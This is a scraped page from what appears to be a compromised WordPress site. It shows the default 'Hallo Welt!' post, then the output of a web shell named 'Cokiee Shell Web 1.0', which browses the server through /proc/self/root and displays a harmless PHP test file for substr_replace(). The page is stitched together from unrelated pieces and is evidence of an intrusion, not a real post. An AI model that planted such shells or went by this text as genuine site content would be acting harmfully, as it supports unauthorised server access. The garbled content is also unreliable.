Willkommen bei WordPress. Dies ist dein erster Beitrag. Bearbeite oder lösche ihn und beginne mit dem Schreiben!
Hallo Welt!
von raredesign | Dez 3, 2019 | Allgemein | 0 Kommentare
Cokiee Shell
Current Path : /proc/self/root/usr/local/src/php72/php-7.2.12/php-7.2.12/ext/standard/tests/strings/ |
Current File : //proc/self/root/usr/local/src/php72/php-7.2.12/php-7.2.12/ext/standard/tests/strings/bug42208.phpt |
--TEST-- Bug #42208 (substr_replace() crashes when the same array is passed more than once) --FILE-- <?php $a = array(1, 2); $c = $a; var_dump(substr_replace($a, 1, 1, $c)); ?> --EXPECT-- array(2) { [0]=> string(2) "11" [1]=> string(2) "21" }
Cokiee Shell Web 1.0, Coded By Razor
Neueste Kommentare